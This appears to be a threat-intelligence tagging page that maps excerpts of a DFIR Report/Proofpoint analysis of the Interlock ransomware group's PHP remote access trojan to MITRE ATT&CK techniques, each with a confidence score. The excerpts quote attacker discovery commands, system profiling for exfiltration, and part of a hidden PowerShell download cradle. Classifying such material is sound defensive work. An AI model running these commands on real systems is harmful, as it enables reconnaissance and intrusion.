Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
96%
“##d into the run command it will execute a powershell script which eventually leads to interlock rat. proofpoint researchers have observed both interlock rat node. js and interlock rat php based variants. the interlock rat php based variant was first spotted in june 2025 campaign…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.003Windows Command Shell
96%
“" cmd. exe / s / c " tasklist " cmd. exe / s / c " nltest / dclist : " cmd. exe / s / c " whoami " cmd. exe / s / c " dir % % appdata % % " - command and control : the interlock rat establishes a robust command and control ( c2 ) channel with the attackers ’ infrastructure. notab…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1018Remote System Discovery
95%
“cmd. exe / s / c " powershell - command " $ searcher = new - object directoryservices. directorysearcher ' ( & ( objectcategory = computer ) ) ' ; $ searcher. propertiestoload. add ( ' name ' ) | out - null ; $ searcher. propertiestoload. add ( ' description ' ) | out - null ; $ …”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.002Malicious File
89%
“kongtuke filefix leads to new interlock rat variant kongtuke filefix leads to new interlock rat variant researchers from the dfir report, in partnership with proofpoint, have identified a new and resilient variant of the interlock ransomware group ’ s remote access trojan ( rat )…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1021.001Remote Desktop Protocol
88%
“(. dll ) and executes it using the windows tool rundll32. exe. autorun command : it sets itself up for persistence. the script adds an entry to the windows registry ' s " run " key. cmd command : it executes any shell command the attacker sends, giving them a remote command promp…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1059.001PowerShell
84%
“##fig (. cfg ) file is passed as input. we created a powershell and python script to parse the config which can be found here. " powershell. exe " - ep bypass - w h - c " schtasks / delete / tn updater / f ; $ w = new - object system. net. webclient ; $ w. headers. add ( \ " user…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1087.002Domain Account
74%
“to gather and exfiltrate a comprehensive system profile as json data. the collected information includes detailed system specifications ( systeminfo ), a list of all running processes and associated services ( tasklist ), running windows services ( get - service ), all mounted dr…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1564.003Hidden Window
71%
“principal. windowsbuiltinrole ] : : administrator ) ) { ' admin ' } else { ' user ' } " " cmd. exe / s / c " powershell - c " tasklist / svc / fo csv | convertfrom - csv | convertto - json " " cmd. exe / s / c " powershell - c " get - service | select - object - property name, di…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1218.011Rundll32
61%
“(. dll ) and executes it using the windows tool rundll32. exe. autorun command : it sets itself up for persistence. the script adds an entry to the windows registry ' s " run " key. cmd command : it executes any shell command the attacker sends, giving them a remote command promp…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1204.004Malicious Copy and Paste
46%
“kongtuke filefix leads to new interlock rat variant kongtuke filefix leads to new interlock rat variant researchers from the dfir report, in partnership with proofpoint, have identified a new and resilient variant of the interlock ransomware group ’ s remote access trojan ( rat )…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1546.013PowerShell Profile
33%
“principal. windowsbuiltinrole ] : : administrator ) ) { ' admin ' } else { ' user ' } " " cmd. exe / s / c " powershell - c " tasklist / svc / fo csv | convertfrom - csv | convertto - json " " cmd. exe / s / c " powershell - c " get - service | select - object - property name, di…”
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
Summary
Researchers from The DFIR Report, in partnership with Proofpoint, have identified a new and resilient variant of the Interlock ransomware group’s remote access trojan (RAT). This new malware, a shift from the previously identified JavaScript-based Interlock RAT (aka NodeSnake), uses PHP and is being used in a widespread campaign. Since May 2025, activity related to […]